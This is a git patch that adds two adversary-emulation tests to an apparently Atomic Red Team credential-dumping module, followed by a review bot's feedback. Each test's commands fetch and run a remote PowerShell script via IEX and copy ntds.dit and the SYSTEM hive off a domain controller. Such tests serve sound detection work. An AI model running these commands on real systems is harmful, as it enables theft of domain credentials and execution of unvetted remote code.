From 02e4420bc07641714f38405687f9eab694466e3d Mon Sep 17 00:00:00 2001
From: kfallahi <46193761+kfallahi@users.noreply.github.com>
Date: Fri, 13 Feb 2026 06:14:07 +0330
Subject: [PATCH] Update T1003.003.md & T1003.003.yaml via UnderlayCopy (#3217)
---
atomics/T1003.003/T1003.003.md | 72 ++++++++++++++++++++++++++++++++
atomics/T1003.003/T1003.003.yaml | 55 ++++++++++++++++++++++++
2 files changed, 127 insertions(+)
diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md
index b45b8ae0..d73307cd 100644
--- a/atomics/T1003.003/T1003.003.md
+++ b/atomics/T1003.003/T1003.003.md
@@ -36,6 +36,10 @@ The following tools and techniques can be used to enumerate the NTDS file and th
- [Atomic Test #9 - Create Volume Shadow Copy with diskshadow](#atomic-test-9---create-volume-shadow-copy-with-diskshadow)
+- [Atomic Test #10 - Copy NTDS in low level NTFS acquisition via MFT parsing](#atomic-test-10---Copy-NTDS-in-low-level-NTFS-acquisition-via-MFT-parsing)
+
+- [Atomic Test #11 - Copy NTDS in low level NTFS acquisition via fsutil](#atomic-test-11---Copy-NTDS-in-low-level-NTFS-acquisition-via-fsutil)
+
@@ -461,8 +465,76 @@ mkdir c:\exfil
diskshadow.exe /s #(unknown)
```
+
+## Atomic Test #10 - Copy NTDS in low level NTFS acquisition via MFT parsing
+This test is intended to be run on a domain Controller.
+UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| extract_path | Path for extracted NTDS.dit | path | C:\Windows\Temp|
+
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing)
+Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+```
+
+
+#### Cleanup Commands:
+```powershell
+remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+```
+
+
+
+
+
+
+## Atomic Test #11 - Copy NTDS in low level NTFS acquisition via fsutil
+This test is intended to be run on a domain Controller.
+UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| extract_path | Path for extracted NTDS.dit | path | C:\Windows\Temp|
+
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing)
+Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+```
+
+
+#### Cleanup Commands:
+```powershell
+remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+```
+
diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml
index 50f69f6b..f085d179 100644
--- a/atomics/T1003.003/T1003.003.yaml
+++ b/atomics/T1003.003/T1003.003.yaml
@@ -261,3 +261,58 @@ atomic_tests:
diskshadow.exe /s #(unknown)
name: command_prompt
elevation_required: true
+- name: Copy NTDS in low level NTFS acquisition via MFT parsing
+ description: |
+ This test is intended to be run on a domain Controller.
+
+ UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+ supported_platforms:
+ - windows
+ input_arguments:
+ extract_path:
+ type: string
+ default: C:\Windows\Temp
+ description: Path for extracted NTDS.dit
+ script_url:
+ description: URL to UnderlayCopy script
+ type: url
+ default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
+ executor:
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR #{script_url} -UseBasicParsing)
+ Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+ Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+ name: powershell
+ elevation_required: true
+ cleanup_command: |
+ remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+ remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+
+- name: Copy NTDS in low level NTFS acquisition via fsutil
+ description: |
+ This test is intended to be run on a domain Controller.
+
+ UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+ supported_platforms:
+ - windows
+ input_arguments:
+ extract_path:
+ type: string
+ default: C:\Windows\Temp
+ description: Path for extracted NTDS.dit
+ script_url:
+ description: URL to UnderlayCopy script
+ type: url
+ default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
+ executor:
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR #{script_url} -UseBasicParsing)
+ Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+ Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+ name: powershell
+ elevation_required: true
+ cleanup_command: |
+ remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+ remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
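Review bot: Both new tests hardcode `C:\Windows\NTDS\ntds.dit` and state they are meant for a domain controller, yet neither declares a `dependencies` prereq, so on any other host `Underlay-Copy` fails mid-run after the remote script has already been pulled and executed via `IEX`; a `Test-Path` prereq on the NTDS file would make the test fail fast and explain why (note the DSA database path is configurable at promotion, so the prereq message should say the default path is assumed). Pinning `script_url` to a commit SHA is the right call, but the `.md` in this same patch still hardcodes the `refs/heads/main` URL and a `path` input type, so it appears not to have been regenerated from the YAML. The second test is titled "via fsutil" while its commands only show `-Mode Metadata`; add a sentence to its description such as `Metadata mode reads the file's cluster layout through fsutil rather than parsing the MFT directly.` if that is what the tool does, or rename the test to match the mode. `extract_path` is described as "Path for extracted NTDS.dit" but also receives `SYSTEM_HIVE`; `Directory for the extracted NTDS.dit and SYSTEM hive` is more accurate.
```yaml
  # … unchanged: name, description, supported_platforms, input_arguments …
  dependency_executor_name: powershell
  dependencies:
  - description: |
      The host must be a domain controller with the NTDS database at the default path.
    prereq_command: |
      if (Test-Path C:\Windows\NTDS\ntds.dit) { exit 0 } else { exit 1 }
    get_prereq_command: |
      Write-Host "Run this test on a domain controller; ntds.dit was not found at C:\Windows\NTDS (default DSA database path assumed)."
  # … unchanged: executor, cleanup_command …
```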